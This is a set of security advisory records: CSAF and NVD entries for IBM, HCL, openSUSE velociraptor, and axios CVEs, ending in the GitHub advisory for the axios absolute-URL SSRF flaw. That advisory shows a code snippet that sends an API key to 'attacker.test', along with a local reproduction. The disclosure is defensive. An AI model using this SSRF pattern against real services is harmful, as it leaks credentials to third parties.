"cpe": "cpe:/a:ibm:app_connect_enterprise:12.0.12.13"
}
}
},
{
"category": "product_version_range",
"name": "\u003c12.11.0",
"product": {
"name": "IBM App Connect Enterprise \u003c12.11.0",
"product_id": "T043525"
}
},
{
"category": "product_version",
"name": "12.11.0",
"product": {
"name": "IBM App Connect Enterprise 12.11.0",
"product_id": "T043525-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:12.11.0"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-57965",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2024-57965"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-29774",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-29774"
},
{
"cve": "CVE-2025-29775",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-29775"
}
]
}
WID-SEC-W-2025-0580
Vulnerability from csaf_certbund - Published: 2025-03-17 23:00 - Updated: 2025-05-04 22:00Summary
IBM License Metric Tool: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Das IBM License Metric Tool dient der Lizenzverwaltung für IBM Produkte.
Angriff
Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen im IBM License Metric Tool ausnutzen, um Daten (Protokolldateien) zu manipulieren, einen Denial-of-Service-Zustand herbeizuführen, vertrauliche Informationen offenzulegen, Sicherheitsmaßnahmen zu umgehen oder SSRF-Angriffe durchzuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Das IBM License Metric Tool dient der Lizenzverwaltung f\u00fcr IBM Produkte.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen im IBM License Metric Tool ausnutzen, um Daten (Protokolldateien) zu manipulieren, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Sicherheitsma\u00dfnahmen zu umgehen oder SSRF-Angriffe durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0580 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0580.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0580 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0580"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-03-17",
"url": "https://www.ibm.com/support/pages/node/7186586"
},
{
"category": "external",
"summary": "POC f\u00fcr CVE-2025-25184",
"url": "https://advisories.gitlab.com/pkg/gem/rack/CVE-2025-25184/"
},
{
"category": "external",
"summary": "POC f\u00fcr CVE-2024-52798",
"url": "https://github.com/advisories/GHSA-rhx6-c78j-4q9w"
},
{
"category": "external",
"summary": "HCL Article KB0120960 vom 2025-05-02",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120960"
}
],
"source_lang": "en-US",
"title": "IBM License Metric Tool: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-04T22:00:00.000+00:00",
"generator": {
"date": "2025-05-05T08:08:53.411+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0580",
"initial_release_date": "2025-03-17T23:00:00.000+00:00",
"revision_history": [
{
"date": "2025-03-17T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-05-04T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von HCL aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "Compliance",
"product": {
"name": "HCL BigFix Compliance",
"product_id": "T038823",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:compliance"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c9.2.39",
"product": {
"name": "IBM License Metric Tool \u003c9.2.39",
"product_id": "T041960"
}
},
{
"category": "product_version",
"name": "9.2.39",
"product": {
"name": "IBM License Metric Tool 9.2.39",
"product_id": "T041960-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:license_metric_tool:9.2.39"
}
}
}
],
"category": "product_name",
"name": "License Metric Tool"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-10917",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-10917"
},
{
"cve": "CVE-2024-12797",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-12797"
},
{
"cve": "CVE-2024-21208",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21208"
},
{
"cve": "CVE-2024-21210",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21210"
},
{
"cve": "CVE-2024-21217",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21217"
},
{
"cve": "CVE-2024-21235",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21235"
},
{
"cve": "CVE-2024-45296",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-45296"
},
{
"cve": "CVE-2024-52798",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-52798"
},
{
"cve": "CVE-2024-57965",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-57965"
},
{
"cve": "CVE-2025-27111",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-27111"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-25184",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-25184"
}
]
}
FKIE_CVE-2025-27152
Vulnerability from fkie_nvd - Published: 2025-03-07 16:15 - Updated: 2025-11-25 17:58
Severity ?
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "22E658DD-EA2E-454A-BEB1-3B9BC30D017E",
"versionEndExcluding": "0.30.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "2EFCE157-4712-4CC5-8DB4-9ACCC8C1016E",
"versionEndIncluding": "1.7.9",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
},
{
"lang": "es",
"value": "axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2."
}
],
"id": "CVE-2025-27152",
"lastModified": "2025-11-25T17:58:17.213",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-03-07T16:15:38.773",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/axios/axios/issues/6463"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
OPENSUSE-SU-2025:15307-1
Vulnerability from csaf_opensuse - Published: 2025-07-03 00:00 - Updated: 2025-07-03 00:00Summary
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Notes
Title of the patch
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Description of the patch
These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15307
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15307",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15307-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27144 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27144/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-30204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-30204/"
}
],
"title": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"tracking": {
"current_release_date": "2025-07-03T00:00:00Z",
"generator": {
"date": "2025-07-03T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15307-1",
"initial_release_date": "2025-07-03T00:00:00Z",
"revision_history": [
{
"date": "2025-07-03T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27144",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27144"
}
],
"notes": [
{
"category": "general",
"text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. In versions on the 4.x branch prior to version 4.0.5, when parsing compact JWS or JWE input, Go JOSE could use excessive memory. The code used strings.Split(token, \".\") to split JWT tokens, which is vulnerable to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this by sending numerous malformed tokens, leading to memory exhaustion and a Denial of Service. Version 4.0.5 fixes this issue. As a workaround, applications could pre-validate that payloads passed to Go JOSE do not contain an excessive number of `.` characters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27144",
"url": "https://www.suse.com/security/cve/CVE-2025-27144"
},
{
"category": "external",
"summary": "SUSE Bug 1237608 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237608"
},
{
"category": "external",
"summary": "SUSE Bug 1237609 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27144"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-30204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-30204"
}
],
"notes": [
{
"category": "general",
"text": "golang-jwt is a Go implementation of JSON Web Tokens. Starting in version 3.2.0 and prior to versions 5.2.2 and 4.5.2, the function parse.ParseUnverified splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request whose Authorization header consists of Bearer followed by many period characters, a call to that function incurs allocations to the tune of O(n) bytes (where n stands for the length of the function\u0027s argument), with a constant factor of about 16. This issue is fixed in 5.2.2 and 4.5.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-30204",
"url": "https://www.suse.com/security/cve/CVE-2025-30204"
},
{
"category": "external",
"summary": "SUSE Bug 1240441 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240441"
},
{
"category": "external",
"summary": "SUSE Bug 1240442 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-30204"
}
]
}
GHSA-JR5F-V2JV-69X6
Vulnerability from github – Published: 2025-03-07 15:16 – Updated: 2025-11-27 08:44
VLAI?
Summary
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
Details
Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Details
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
- When
baseURLis set, passing an absolute URL such ashttp://attacker.test/toget()should not ignorebaseURL. - Before sending the HTTP request (after combining the
baseURLwith the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL.
PoC
Follow the steps below to reproduce the issue:
- Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
- Run the script:
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
Impact
- Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses
baseURLand does not validate path parameters is affected by this issue.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
